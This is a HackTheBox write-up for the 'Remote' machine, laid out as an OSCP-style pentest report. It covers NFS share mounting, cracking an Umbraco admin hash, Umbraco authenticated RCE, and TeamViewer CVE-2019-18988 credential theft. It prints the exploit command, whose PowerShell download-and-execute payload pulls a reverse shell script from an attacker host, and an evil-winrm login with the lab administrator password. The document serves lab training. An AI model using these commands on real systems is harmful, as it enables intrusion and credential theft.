Remote — HackTheBox Writeup OSCP Style

~ Dade Murphy

InfoSec Write-ups – Medium–

Remote — HackTheBox Writeup OSCP Style

Remote was an easy difficulty windows machine that featured Umbraco RCE and the famous Teamviewer’s CVE-2019–18988. Been thinking to publish an article in OSCP style, it took a while.

Offsec’s PWK Example Report: https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf

I used the above example report for my OSCP exam report and this walkthrough will follow the same template as well.

Report-Penetration

The penetration testing portion of the assessment focuses heavily on gaining access to Remote machine. During this penetration test, Preetham was able to successfully gain access to the Remote machine.

Vulnerability Exploited: Umbraco CMS — Remote Code Execution by authenticated administrators

System Vulnerable: 10.10.10.180

Vulnerability Explanation: Umbraco CMS suffers from an authenticated remote code execution vulnerability at the xsltVisualise functionality. The credentials to the Umbraco CMS were found by mounting an NFS share which had Umbraco.sdf file which is a SQL Server Compact Edition file.

References: https://www.exploit-db.com/exploits/46153

noraj/Umbraco-RCE

Privilege Escalation Vulnerability: Teamviewer CVE-2019–18988 Gather credentials from registry.

Reference: https://whynotsecurity.com/blog/teamviewer/

Vulnerability Fix: Update Teamviewer to the latest version

Severity: Critical

Information Gathering

Full Nmap Scan

Nmap scan report for 10.10.10.180
Host is up (0.74s latency).
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

There is FTP with anonymous access allowed and a Web server, RPC, SMB and NFS ports open. Preetham found NFS shares export list with showmount and mounted the site_backups share.

Umbraco.sdf file

root@kali:~/htb/boxes/remote# strings Umbraco.sdf | grep admin                                                                                               Administratoradmindefaulten-US                                                                                                                               
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d                                                                                           
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change

Preetham obtained admin account hash (b8be16afba8c314ad33d812f22a04991b90e2aaa)of SHA1 type.

Cracking Hash

Preetham obtained the password as baconandcheese

Remote Code Execution

Reference: https://github.com/noraj/Umbraco-RCE

Reverse Shell

Preetham used https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 to obtain a reverse shell.

Command

python3 exploit.py -u ‘admin@htb.local’ -p ‘baconandcheese’ -i ‘http://10.10.10.180' -c powershell.exe -a “IEX(New
-Object System.Net.WebClient).DownloadString(‘http://10.10.14.42/shell.ps1')"

User.txt and IP address

Privilege Escalation: Teamviewer CVE-2019–18988 Gather credentials from registry

Reference: https://whynotsecurity.com/blog/teamviewer/

On enumeration Preetham found Teamviewer installed on the machine.

Preetham found that the version of Teamviewer is 7 by doing the below.

Preetham obtained a meterpreter shell by executing malicious binary created by msfvenom on the machine.

Preetham ran Teamviewer MSF module and found Administrator’s password and logged in using WinRM.

Command: evil-winrm -i 10.10.10.180 -u administrator -p ‘!R3m0te!’

Root.txt and ipconfig

Remote — HackTheBox Writeup OSCP Style was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

View original article on InfoSec Write-ups – Medium

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s